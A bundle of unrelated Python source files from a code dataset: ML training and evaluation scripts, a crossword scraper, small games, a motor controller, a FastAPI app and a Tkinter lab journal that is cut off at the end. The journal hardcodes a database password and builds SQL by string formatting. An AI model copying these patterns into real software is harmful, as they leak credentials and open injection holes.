scipy.stats.mstats_basic import sen_seasonal_slopes\n\n\n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger(__name__)\n\n\nclass SentenceGeneration(object):\n def __init__(self):\n self.model = Sequential()\n self.index2word = dict()\n self.word2Index = dict()\n self.index2token = dict()\n self.token2Index = dict()\n with open(\"../data/comment_f_keyword_Vocab.txt\") as fin:\n for i, word in enumerate(fin):\n word = word.rstrip()\n self.index2word[i] = word\n self.word2Index[word] = int(i)\n with open(\"../data/code_f_keyword_Vocab.txt\") as fin:\n for i, word in enumerate(fin):\n word = word.rstrip()\n self.index2token[i] = word\n self.token2Index[word] = int(i)\n\n # def __init__(self,codes,targets):\n # self.model = Sequential()\n # # self.codes = codes\n # # self.targets = targets\n\n def readModel(self, name):\n model = model_from_json(open('../model/'+name + '.json').read())\n model.load_weights('../model/'+name + '.h5')\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=[\"accuracy\"])\n\n self.model = model\n\n def printSentence(self, indices):\n return ' '.join([self.index2word[x] for x in indices])\n\n #for index in indices:\n # print self.index2word[index],\n def returnCode(self, indices):\n\n return ' '.join([self.index2token[x-1] for x in indices])\n\n def removeToken(self,indices):\n indices = indices[1:-1]\n unk_index = self.word2Index['UNK']\n if unk_index in indices:\n indices.remove(unk_index)\n return indices\n\n\n\n\n\n def generateSentence(self, code, n):\n\n code = sequence.pad_sequences([code], maxlen=600)\n\n\n pred = self.model.predict(code)[0]\n sorted_pred = np.argsort(pred)[::-1]\n\n pred_word = [ self.index2token[index] for index in sorted_pred[:n]]\n return pred_word\n\n\ndef rAtk(pred, target, k):\n #sorted_pred = np.argsort(pred)[::-1]\n correct = 0\n for i in pred[:k]:\n if i in target:\n correct += 1\n\n return correct / float(len(target))\n\ngen = SentenceGeneration()\ngen.readModel('keyword_f')\n\ndata_gen = data_generator.DataGenerator(\"../data/code_f_keyword_indexed.txt\", \"../data/comment_f_keyword_indexed.txt\",\n 0.20, 600, 20)\n\ncodes,keywords,raw_comment= 
data_gen.getTestData()\n\nnp.random.seed(30)\nnp.random.shuffle(codes)\nnp.random.seed(30)\nnp.random.shuffle(raw_comment)\nnp.random.seed(30)\nnp.random.shuffle(keywords)\n\n\nsens = []\nco = []\ncomm = []\nr = 0\nk = 30\nfor i,(code,comment) in enumerate(zip(codes,keywords)):\n #keyword = gen.generateSentence(code,5)\n c = sequence.pad_sequences([code], maxlen=600)\n pred = gen.model.predict(c)[0]\n #pred[52] = 0\n\n sorted_pred = np.argsort(pred)[::-1]\n\n sens.append([gen.index2word[s] for s in sorted_pred[:k]])\n co.append(gen.returnCode(code))\n comm.append(gen.printSentence(comment))\n\n r += rAtk(sorted_pred, comment, k)\n\n\n\n sys.stdout.write('\\r' + str(i)+' score :'+str(r/(i+1)))\n\n\n\n\n\n\nwith open('keyword_prediction4.txt', 'w') as fin:\n fin.write(str(r/(i+1)))\n fin.write(\"\\n\")\n for i in range(len(co[:300])):\n s = str(co[i])\n code = s.replace(\"{\",\"{\\n\").replace(\";\",\";\\n\").replace(\"}\",\"}\\n\")\n fin.write(\"code:\\n\"+ code)\n fin.write(\"comment:\\n\"+ raw_comment[i].rstrip()+ '\\n')\n fin.write(\"--generate--\\n\")\n\n fin.write(' '.join(sens[i])+'\\n')\n fin.write(\"\\n\")\n # for sen in sens:\n # fin.write(gen.printSentence(sen[1:-1])+'\\n')\n","sub_path":"predictor/KeywordPrediction.py","file_name":"KeywordPrediction.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"269342709","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 20 13:08:08 2019\r\n\r\n@author: jbgab\r\n\"\"\"\r\n\r\nimport glob\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport SoilVarDepth\r\n\r\nfolderPath='ternsoildata\\\\'\r\nfiles = glob.glob(folderPath+'*.dat')\r\ninfiles=[]\r\nfor file in files: \r\n thisfile=pd.read_csv(file,index_col=0,skiprows=[0,2,3])\r\n thisfile.index=pd.to_datetime(thisfile.index)\r\n infiles.append(thisfile)\r\nconcat=pd.concat(infiles[:], ignore_index=False,sort=False)\r\nconcat.index=pd.to_datetime(concat.index)\r\n#list columns that you want to plot\r\nVW_Avg=['VW_Avg(1)', 'VW_Avg(2)', 'VW_Avg(3)', 'VW_Avg(4)']\r\nPA=['PA_uS_Avg(1)', 'PA_uS_Avg(2)', 'PA_uS_Avg(3)', 'PA_uS_Avg(4)']\r\n#select list of columns you want to plot\r\ncolumns=VW_Avg\r\ncolumns.reverse()\r\n\r\nsizeParam=30,6 #change x,y size of plot\r\nconcat=concat.loc[:,columns]\r\n#pivot=concat.loc[:,['VW_Avg(1)', 'VW_Avg(2)', 'VW_Avg(3)', 'VW_Avg(4)']].T.astype(float)\r\npivot=concat.pivot_table(columns=concat.index)\r\npivot=pivot.reindex(index=columns)\r\n\r\nSoilVarDepth.soilVarDepth(pivot,title='ternsoildata',sizeParam=sizeParam,xlabel='onceamonth')\r\n\r\n","sub_path":"ternsoildataSoilVarDepth.py","file_name":"ternsoildataSoilVarDepth.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"259022401","text":"import requests\nimport json\nimport datetime\nimport sys\nimport re\n\ndef save_results(response):\n pattern = r\".+scoreList.+?(\\[.+?\\]).+\"\n body = response.text.splitlines()\n for b in body:\n match = re.match(pattern, b)\n if match is not None:\n break\n scores = match.group(1)\n l = json.loads(scores)\n today = datetime.datetime.today()\n date_str = str(today.date())\n d = {date_str: l}\n with open('scores.json', 'w') as fout:\n fout.write(json.dumps(d))\n print('Success')\n \ndef get_nyt_body(cookie):\n url = \"https://www.nytimes.com/puzzles/leaderboards\"\n headers = {\n 'authority': 'www.nytimes.com',\n 'pragma': 
'no-cache',\n 'cache-control': 'no-cache',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'sec-fetch-site': 'none',\n 'referer': 'https://www.nytimes.com/crosswords',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9',\n 'cookie': cookie,\n }\n\n response = requests.get('https://www.nytimes.com/puzzles/leaderboards', headers=headers)\n if response.status_code != 200:\n print(\"Unable to connect to nyt status_code:%s\" % response.status_code)\n return None\n return response\n\ndef main(cookie):\n response = get_nyt_body(cookie)\n if response is None:\n sys.exit(1)\n return\n save_results(response)\n \n\nif __name__ == \"__main__\":\n \n cookie = sys.argv[1]\n main(cookie)","sub_path":"get_crossword.py","file_name":"get_crossword.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"263705014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 18 11:02:28 2018\n\n@tillyoswellwheeler: 612383362\n\"\"\"\n\n#---------------------------------------------------------------------------------------\n# CHAPTER TEN - Guessing Game\n#---------------------------------------------------------------------------------------\n\nfrom random import randint\n\n# The imported function is below:\ndef guess(attempts, end_range):\n number = randint(1, end_range)\n print(\"Welcome! Can you guess my secret number?\")\n # My code is below:\n # Tell the user how many attempts/guesses they have.\n \n print(\"You have {} attempts to guess right\".format(attempts))\n \n # Read in their guess into the game\n \n while attempts > 0:\n guess = input(\"What's my secret number? 
\")\n guess = int(guess)\n attempts -= 1\n \n # Compare their guess to the number which has been generated from the randint imported function\n if guess == number:\n print(\"You're a telepathic genius!\")\n return\n # Tell them if their guess is right or wrong\n print(guess, \" was correct\")\n # Note if they are right how do we *break* out of the while loop?\n # If the while loop is looping not just on guesses but on the correct guess?\n print(\"You had\", attempts, \"left!\")\n break\n # If their guess is wrong, tell them whether they are too high or too low\n elif guess != number:\n if guess >= number:\n print(\"Your guess was too high\")\n elif guess <= number:\n print(\"Your guess was too low\")\n else:\n return number\n \n print(\"END-OF-GAME: Thanks for playing!\")\n print(\"The secret number was\", number)\n\nguess(3, 20) \n","sub_path":"ch11_while-loops/ch11_guessing_game.py","file_name":"ch11_guessing_game.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"89394163","text":"import random\n\nclass Hangman:\n possible_words = ['becode', 'learning', 'mathematics', 'sessions']\n word_to_find = \"\"\n hidden_word = []\n lives = 5\n letter = ''\n number_of_words = 0\n correctly_guessed_letters = []\n wrongly_guessed_letters = []\n turn_count = 0\n error_count = 0\n\n def init_my_function(cls):\n cls.number_of_words = len(cls.possible_words) - 1\n cls.word_to_find = cls.possible_words[random.randint(0, cls.number_of_words)]\n cls.hidden_word = '_' * len(cls.word_to_find)\n print(\" \".join(list(map(str,cls.hidden_word))))\n print('')\n\n def start_game(cls):\n cls.init_my_function()\n cls.play()\n\n def print_my_round(cls):\n print(\" \".join(list(map(str,cls.hidden_word))))\n print('\\n')\n print(f\"Wrongly guessed letter --> {cls.wrongly_guessed_letters}.\")\n print(f\"Correctly guessed letter --> {cls.correctly_guessed_letters}.\")\n print(f\"Number of lives remaining --> {cls.lives}.\")\n print(f\"Error Count --> {cls.error_count}.\")\n print(f\"Turn Count --> {cls.turn_count}.\")\n\n def game_over():\n print(\"GAME OVER ...\")\n\n def well_played(cls):\n print(f\"You found the word: {cls.word_to_find} in {cls.turn_count} turn with {cls.error_count} errors!\")\n\n def check_letter(cls):\n if len(cls.letter) != 1:\n print(\"Please, insert only one character\")\n return 1\n# def check_end_of_game(cls):\n# if c\n\n def play(cls):\n while (cls.lives) != 0:\n cls.letter = input(\"Please enter a letter: \")\n cls.print_my_round()\n","sub_path":"utils/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"495734259","text":"from adafruit_servokit import ServoKit #서보모터 드라이버를 사용하기 위해 패키지를 불러옵니다\nimport board #서보모터 드라이버 패키지에 종속된 패키지입니다\nimport busio #위와같이 서보모터 드라이버 패키지에 종속된 패키지입니다\nimport time #모터 제어시 delay를 주기 위해 time패키지를 불러옵니다\n\n\"\"\"\nmotorinit()함수는\n배에 있는 두 종류의 모터(BLDC 프로펠러, 서보모터)들을 사용하기 위해\n서보모터 드라이버와 ESC(BLDC 모터 드라이버)를 초기화 시키는 코드입니다\n또한 다른 위치로 가있는 서보모터를 중앙으로 정렬하기도 합니다\n\n\n작동원리\n서보모터 드라이버의 모터 0번에 서보모터가 연결되어있습니다\n서보모터 드라이버의 모터 1번에 BLDC 모터와 연결된 ESC(드라이버)가 연결되어 있습니다\n\n서보모터의 경우 서보모터 드라이버만 초기화 되면 바로 사용할 수 있지만\nBLDC모터의 경우 처음 전원을 켰을 때 ESC에 90의 PWM 신호를 주어 초기화를 시켜 주어야 합니다\n그러고 나면 이 90 신호는 중간(정지) 신호가 되고 90보다 얼마나 작느냐 크느냐에 따라\n각각 정회전 속도와 역회전 속도 신호가 됩니다\n\"\"\"\n\ndef motorinit():\n print(\"i2c connetion initalzing\")\n i2c_bus0=(busio.I2C(board.SCL_1, board.SDA_1)) #i2c통신을 젯슨 
def motorinit():\n    print(\"i2c connection initializing\")\n    i2c_bus0=(busio.I2C(board.SCL_1, board.SDA_1)) #start I2C communication on the Jetson Nano's pins 27 and 28\n    global ship_servo_kit #declare the global variable ship_servo_kit (the servo driver handle)\n    ship_servo_kit = ServoKit(channels=16, i2c=i2c_bus0) #attach the servo driver to ship_servo_kit\n    print(\"i2c connection initializing finished\")\n    ship_servo_kit.servo[0].angle=90 #set motor 0 (the servo) to 90 degrees so it faces forward if it was pointing elsewhere\n    print(\"servo motor initializing finished\")\n    print(\"BLDC motor calibrating\")\n    ship_servo_kit.servo[1].angle=90 #send 90 to motor 1 (the BLDC motor behind its ESC) to calibrate the ESC signal (takes about 2 seconds)\n    time.sleep(2) #wait about 2 seconds\n    print(\"BLDC motor calibrating finished\")\n\n\"\"\"\nservomove(angle), as the name says, rotates the servo to the given angle.\nSimply call the function with the desired angle.\n\"\"\"\n \ndef servomove(degree):\n    global ship_servo_kit #use ship_servo_kit (the servo driver handle) in this function too\n    ship_servo_kit.servo[0].angle=degree #move motor 0 (the servo) to the given angle\n    time.sleep(0.02) #delay 0.02 s to avoid errors\n\n\"\"\"\nbldcmove(speed relative to 90) runs the BLDC motor at the given speed.\nValues below 90 spin it forward, values above 90 in reverse, and the speed\ngrows the further the value is from 90. Simply call the function with the speed.\n\"\"\"\n \ndef bldcmove(speed):\n    global ship_servo_kit #use ship_servo_kit (the servo driver handle) in this function too\n    ship_servo_kit.servo[1].angle=speed #drive motor 1 (the BLDC motor) at the given speed relative to 90\n    time.sleep(0.02) #delay 0.02 s to avoid errors\n","sub_path":"codes_with_explain/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479324018","text":"#!/usr/bin/env python\nfrom jinja2 import Template, Environment, FileSystemLoader\nimport os\nimport json\n\n# Capture our current directory\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef show_cli_output(template_file, response):\n    # Create the jinja2 environment.\n    # Notice the use of trim_blocks, which greatly helps control whitespace.\n\n    template_path = os.path.abspath(os.path.join(THIS_DIR, \"../render-templates\"))\n\n    j2_env = Environment(loader=FileSystemLoader(template_path),extensions=['jinja2.ext.do']) \n    j2_env.trim_blocks = True\n    j2_env.lstrip_blocks = True\n    j2_env.rstrip_blocks = True\n\n    if response:\n        print (j2_env.get_template(template_file).render(json_output=response))\n","sub_path":"src/CLI/renderer/scripts/render_cli.py","file_name":"render_cli.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134681862","text":"#LANGUAGE: Python\n# AUTHOR: Nishigandha Kalkote\n# GITHUB: \"https://github.com/nishikalkote\"\n\n\nprint(\"HELLO WORLD!\")\narr = []\nn = int(input('Enter how many elements you want: '))\nfor i in range(0, n):\n    x = input('Enter the numbers into the array: ')\n    arr.append(x)\nprint(arr)\n","sub_path":"programs/Helloarray.py","file_name":"Helloarray.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"118015004","text":"from fastapi import FastAPI, Depends, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\n\nfrom .routers import users, projects\nfrom .database import engine, metadata\n\n\nmetadata.create_all(bind=engine)\n\napp = FastAPI(\n    \n)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\norigins = ['*']\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    
allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\napp.include_router(users.router)\napp.include_router(projects.router)\n\ntemplates = Jinja2Templates(directory='templates')\n\n# @app.on_event(\"startup\")\n# async def startup():\n# await database.connect()\n\n# @app.on_event(\"shutdown\")\n# async def shutdown():\n# await database.disconnect()\n\n@app.get(\"/dashboard\", response_class=HTMLResponse)\nasync def root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"id\": id})\n\n\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454823998","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport numpy as np\nimport tensorflow as tf\nimport time\nimport sys\n\nfrom . import analysis\nfrom . import config\nfrom contextlib import contextmanager\nfrom xilio import dump, write, append\n\n\ntools = type(\"Tools\", (), {})()\n\n__all__ = [\"simple_train\", \"training\"]\n\n\ndef epoch_train(tools):\n \"\"\"\n Do epoch train for one times.\n\n input: tools\n\n \"\"\"\n sess = tools.sess\n optimizer = tools.optimizer\n\n infos, summary, g, _ = sess.run(tools.infos)\n print(config.INFOMESSAGE(infos))\n sys.stdout.flush()\n tools.reporter(summary, g)\n\n try:\n while True:\n sess.run(optimizer)\n except tf.errors.OutOfRangeError:\n pass\n return infos\n\n\n@contextmanager\ndef training(merge_key=tf.GraphKeys.SUMMARIES, restore_from=None):\n with tf.Session() as sess:\n graph = tf.get_default_graph()\n\n path = config.DATANAME + \"/\" + time.strftime(\"%m-%d-%y_%H_%M\")\n # path = config.DATANAME\n g = tf.Variable(0, name=\"global_step\", trainable=False)\n with tf.name_scope(\"epoch_step\"):\n e = tf.Variable(0, name=\"epoch_step\", trainable=False)\n e_add = tf.assign(e, e + 1)\n\n fin_loss = analysis.fin_loss()\n with tf.name_scope(\"train\"):\n learning_rate = tf.train.exponential_decay(\n float(config.LEARNING_RATE), e,\n float(config.DECAY_STEP), float(config.DECAY_RATE)\n )\n optimizer = (tf.train.AdamOptimizer(learning_rate)\n .minimize(fin_loss, global_step=g))\n accur = graph.get_tensor_by_name(\"analysis/accuracy_train:0\")\n val_accur = graph.get_tensor_by_name(\"analysis/accuracy_test:0\")\n infos = [e, fin_loss, accur, val_accur]\n updates = [e_add, optimizer]\n\n writer = tf.summary.FileWriter(path + \"/summary\", graph)\n summary = tf.summary.merge_all(merge_key)\n saver = tf.train.Saver(tf.get_collection(\"trainable_variables\"))\n print(\"check\")\n if restore_from:\n print(config.DATANAME + \"/\" + restore_from)\n ckpt = tf.train.latest_checkpoint(\n config.DATANAME + \"/\" + restore_from)\n if ckpt:\n print(\"RESTROE\")\n saver.restore(sess, ckpt)\n\n tools.path = path\n tools.sess = sess\n tools.graph = graph\n tools.saver = saver\n tools.infos = [infos, summary, g, updates]\n tools.optimizer = optimizer\n import types\n\n def reporter(self, summary, e):\n writer.add_summary(summary, e)\n writer.flush()\n saver.save(sess, path + \"/chkpnt\", g)\n\n tools.reporter = types.MethodType(reporter, tools)\n\n tf.global_variables_initializer().run(None, sess)\n tf.local_variables_initializer().run(None, sess)\n graph.finalize()\n yield tools\n\n\ndef dump_info(path, info):\n f = open(path)\n f.write(info)\n f.close()\n\n\ndef simple_train(epoch_steps):\n infos = []\n start_time = time.time()\n with training(restore_from=config.RESTORE_FROM) as tools:\n 
write(tools.path + \"/description\", config.DISCRIPTION + \"\\n\")\n for i in range(epoch_steps):\n batch_init = tf.get_collection(\"batch_init\")\n tools.sess.run(batch_init)\n infos.append(epoch_train(tools))\n if i > 5:\n recent = [x[1] for x in infos[-5:]]\n if np.std(recent) < config.STOP_THRESHOLD:\n break\n dump(tools.path + \"/trace\", infos)\n duration = time.time() - start_time\n append(tools.path + \"/description\",\n \"Time usage: \" + time.strftime(\n \"%M minutes, %S seconds\",\n time.gmtime(duration)) + \"\\n\")\n return infos\n","sub_path":"lc/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"407745876","text":"#!/usr/bin/env python3\n\nfrom tkinter import * \nfrom tkinter.ttk import Combobox, Radiobutton, Entry, Spinbox \nimport tkinter.ttk as ttk\nimport datetime\nfrom datetime import date\nimport ast\nimport winreg \nimport psycopg2\nfrom idlelib.tooltip import Hovertip\nimport subprocess\nimport configparser\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\nsurnames = config['people']['engineers']\nsurnames = [element.strip(\"'[]\") for element in surnames.split(\", \")]\nprint(surnames)\nprint(type(surnames))\n\n\n#Работа с буфером по клавишам Ctr-C, Ctr-V, Ctr-X\ndef _onKeyRelease(event): \n ctrl = (event.state & 0x4) != 0\n if event.keycode==88 and ctrl and event.keysym.lower() != \"x\":\n event.widget.event_generate(\"<>\")\n if event.keycode==86 and ctrl and event.keysym.lower() != \"v\":\n event.widget.event_generate(\"<>\")\n if event.keycode==67 and ctrl and event.keysym.lower() != \"c\":\n event.widget.event_generate(\"<>\")\n\n# Функция работы с комментариями по стендам\ndef comments(model, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n print(\"Подключение к базе данных: ОК\")\n \n except:\n print(\"Не удалось подключиться к базе данных\")\n \n # Считывание комментариев по заданному SN\n try:\n cur = con.cursor()\n if SN == \"ALL\":\n cur.execute(\"SELECT date, time, author, commentary, serial_number, number_in_departament FROM public.comments ORDER BY (date, time) DESC;\")\n rows = cur.fetchall()\n else:\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time) DESC;\" %SN)\n rows = cur.fetchall()\n with open(\"comments.txt\", 'w', encoding='utf-8') as f:\n for row in rows:\n f.write(\"\\nДата: \" + str(row[0]))\n f.write(\"\\nВремя: \" + str(row[1]))\n f.write(\"\\nАвтор: \" + str(row[2]))\n f.write(\"\\nКомментарий: \" + str(row[3]))\n f.write(\"\\nСерийный: \" + str(row[4]))\n f.write(\"\\nПорядковый номер: \" + str(row[5]))\n f.write(\"\\n\")\n con.close()\n except:\n print(\"Данные в таблице комментариев отсутствуют\")\n subprocess.Popen(\"C:\\\\Windows\\\\notepad.exe D:\\\\myprogram\\\\bin\\\\journal\\\\comments.txt\")\n\n# Фукнция открытия карточки компьютера\ndef PC_card(model, SN, number_in_departament):\n window_card = Tk()\n window_card.bind_all(\"\", _onKeyRelease, \"+\") \n window_card.title(\"Карточка компьютера \" + model)\n window_card.geometry(\"620x500\")\n Label(window_card, text = (\"Последние комментарии:\")).place(x=10, y=90)\n text_card = Text(window_card, width=50, height=10)\n text_card.place(x=10, y=110)\n text_card.bind(\"\")\n SUBD_get_PC(model, window_card, text_card, SN)\n 
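The queries above and below splice serial numbers into SQL with % string formatting (e.g. "... WHERE serial_number = '%s';" % SN), which breaks on quotes and invites injection. psycopg2 binds parameters itself when they are passed separately from the statement; a sketch against the same comments table (the connection is assumed to come from the caller):

import psycopg2

def fetch_comments(conn, serial_number):
    # psycopg2 quotes and escapes the bound value; no manual interpolation.
    with conn.cursor() as cur:
        cur.execute(
            "SELECT date, time, author, commentary"
            " FROM public.comments"
            " WHERE serial_number = %s"
            " ORDER BY (date, time) DESC;",
            (serial_number,),
        )
        return cur.fetchall()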
Label(window_card, text = (\"Ваш комментарий:\")).place(x=10, y=300)\n text_wr = Text(window_card, width=50, height=5)\n text_wr.place(x=10, y=320)\n text_wr.bind(\"\")\n Label(window_card, text = (\"Новый IP:\")).place(x=480, y=190)\n IP_new = Text(window_card, width=13, height=1)\n IP_new.place(x=480, y=215)\n IP_new.insert(1.0, '192.168.0.0')\n poverka_wr = Button(window_card, text=\"Записать\", command = lambda: SUBD_push_one(window_card, IP_new, SN, model, pc))\n poverka_wr.place(x=490, y=240)\n btn_wr = Button(window_card, text=\"Отправить\", command = lambda: SUBD_push(window_card, text_wr, model, combo, sel.get(), text_card, number_in_departament))\n btn_wr.place(x=350, y=420)\n lbl01 = Label(window_card, text = \"Выберите фамилию:\").place(x=10, y=420)\n combo = Combobox(window_card, width = 13, values = surname)\n combo.place(x=150, y=420)\n combo.current(3)\n lbl_alarms = LabelFrame(window_card, text = \"Состояние\")\n lbl_alarms.place(x = 470, y=300, width = 140, height = 120)\n sel = IntVar(lbl_alarms)\n sel.set(1)\n rad_alarm1 = Radiobutton(lbl_alarms, text='В работе', variable=sel, value=1)\n rad_alarm1.place(x=5, y=0)\n rad_alarm2 = Radiobutton(lbl_alarms, text='Не работает', variable=sel, value=2)\n rad_alarm2.place(x=5, y=30) \n rad_alarm3 = Radiobutton(lbl_alarms, text='Есть проблемы', variable=sel, value=3)\n rad_alarm3.place(x=5, y=60)\n\n#Функция получения данных о компьютере из БД\ndef SUBD_get_PC(model, window_card, text_card, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n label_dbsuc = Label(window_card, text = \"Подключение к базе данных: ОК\", foreground = 'green')\n label_dbsuc.place(x=10, y=5)\n\n except:\n label_dbsuc = Label(window_card, text = \"Не удалось подключиться к базе денных\", foreground = 'red')\n label_dbsuc.place(x=10, y=5)\n\n try:\n # Считывание данных ПК из таблицы pc\n cur = con.cursor()\n cur.execute(\"SELECT serial_number, name_pc, ip, alarms, radmin, windows, net_monitor, inkotex, other_soft FROM public.pc WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in rows:\n Label(window_card, text = (\"СН установки: \" + row[0])).place(x=10, y=25)\n name_PC = row[1]\n Label(window_card, text = (\"Номер ПК: \" + row[1])).place(x=10, y=45)\n Label(window_card, text = (\"IP-адрес: \" + row[2])).place(x=10, y=65)\n ip_ad = row[2]\n print(ip_ad)\n if row[3] == 'work':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'green').place(x=200, y=25)\n elif row[3] == 'not_work':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'red').place(x=200, y=25)\n elif row[3] == 'is_problems':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'orange').place(x=200, y=25)\n else:\n Label(window_card, text = (\"Состояние: нет\"), foreground = 'red').place(x=200, y=25)\n Label(window_card, text = (\"Radmin: \" + row[4])).place(x=200, y=45)\n Label(window_card, text = (\"Windows: \" + row[5])).place(x=200, y=65)\n Label(window_card, text = (\"Net Monitor 2: \" + row[6])).place(x=390, y=65)\n Label(window_card, text = (\"Инкотекс: \" + row[7])).place(x=390, y=25)\n Label(window_card, text = (\"Другие: \" + row[8])).place(x=390, y=45)\n btn_radmin = Button(window_card, text=\"Radmin\", command = lambda: subprocess.Popen('C:\\\\Program Files\\\\Radmin Viewer 3\\\\Radmin.exe /connect:%s:4899 '%ip_ad))\n btn_radmin.place(x=490, y=110)\n btn_ping = 
Button(window_card, text=\"Ping\", command = lambda: subprocess.Popen('C:\\\\windows\\\\system32\\\\ping.exe %s '%ip_ad))\n btn_ping.place(x=490, y=145)\n except:\n Label(window_card, text = \"Данные в таблице установок отсутсвуют!!!\", foreground = 'red').place(x=10, y=25)\n\n try:\n # Считывание комментариев по данному компьютеру\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time);\" %model)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n text_card.insert(1.0, \"Данные в таблице комментариев отсутствуют\")\n\n\n# Функция открытия карточки стенда\ndef installation_card(model, SN, number_in_departament):\n window_card = Tk()\n window_card.bind_all(\"\", _onKeyRelease, \"+\") \n window_card.title(\"Карточка стенда \" + model + \" SN \" + SN)\n window_card.geometry(\"620x500\")\n Label(window_card, text = (\"Последние комментарии:\")).place(x=10, y=90)\n text_card = Text(window_card, width=50, height=10)\n text_card.place(x=10, y=110)\n SUBD_get(window_card, text_card, SN)\n Label(window_card, text = (\"Ваш комментарий:\")).place(x=10, y=300)\n text_wr = Text(window_card, width=50, height=5)\n text_wr.place(x=10, y=320)\n Label(window_card, text = (\"Новая дата:\")).place(x=480, y=190)\n poverka_text = Text(window_card, width=10, height=1)\n poverka_text.place(x=480, y=215)\n poverka_text.insert(1.0, 'ГГГГ-ММ-ДД')\n poverka_wr = Button(window_card, text=\"Записать\", command = lambda: SUBD_push_one(window_card, poverka_text, SN, number_in_departament, installations))\n poverka_wr.place(x=490, y=240)\n btn_wr = Button(window_card, text=\"Отправить\", command = lambda: SUBD_push(window_card, text_wr, SN, combo, sel.get(), text_card, number_in_departament))\n btn_wr.place(x=350, y=420)\n lbl01 = Label(window_card, text = \"Выберите фамилию:\").place(x=10, y=420)\n combo = Combobox(window_card, width = 13, values = surname)\n combo.place(x=150, y=420)\n combo.current(3)\n lbl_alarms = LabelFrame(window_card, text = \"Состояние\")\n lbl_alarms.place(x = 470, y=300, width = 140, height = 120)\n sel = IntVar(lbl_alarms)\n sel.set(1)\n rad_alarm1 = Radiobutton(lbl_alarms, text='В работе', variable=sel, value=1)\n rad_alarm1.place(x=5, y=0)\n rad_alarm2 = Radiobutton(lbl_alarms, text='Не работает', variable=sel, value=2)\n rad_alarm2.place(x=5, y=30) \n rad_alarm3 = Radiobutton(lbl_alarms, text='Есть проблемы', variable=sel, value=3)\n rad_alarm3.place(x=5, y=60)\n \n\n# Функция записи комментариев в БД (установки)\ndef SUBD_push(window_card, text_wr, SN, combo, alarms, text_card, number_in_departament):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n Label(window_card, text = \"Подключение к базе данных: ОК \", foreground = 'green').place(x=10, y=450)\n except:\n Label(window_card, text = \"Подключение к базе данных отсутсвует\", foreground = 'red').place(x=10, y=450)\n try:\n #Запись комментария в таблицу БД\n if alarms == 